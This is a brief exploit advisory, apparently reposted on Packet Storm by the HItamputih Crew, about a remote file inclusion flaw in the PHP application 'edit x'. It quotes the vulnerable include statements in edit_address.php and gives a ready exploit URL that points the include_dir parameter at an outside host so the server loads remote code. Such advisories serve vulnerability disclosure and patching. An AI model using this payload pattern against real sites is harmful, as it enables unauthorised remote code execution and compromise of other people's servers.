edit x suffers from a remote file inclusion flaw.
a6471d2b806439f646be5d7ba5cf26413a3ce5627c1da0b485097c803a379517============================ HItamputih Crew ====================
# hitamputih Advisory
# Discovered By : IbnuSina
#-----------------------------------------------------------
# Software: edit x
# Vendor : http://www.edit-x.com
# Method: file inclusion
# Thanks To : akukasih,nyubi,irvian,BlueSpy,IFX,arioo and all #hitamputih crew
[[inject]]]---------------------------------------------------------
on file editx/edit_address.php
$_SESSION = array();
include($include_dir.'/'.'session.'.PHP);
include($include_dir.'/'.'function.'.PHP);
require_once("../ups/upsavs.php");
exploit :
http://target.lu/[editx PATH]/editx/edit_address.php?include_dir=HTTP://injekan.lu?
[[End]]-----------------------------------------------------------
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed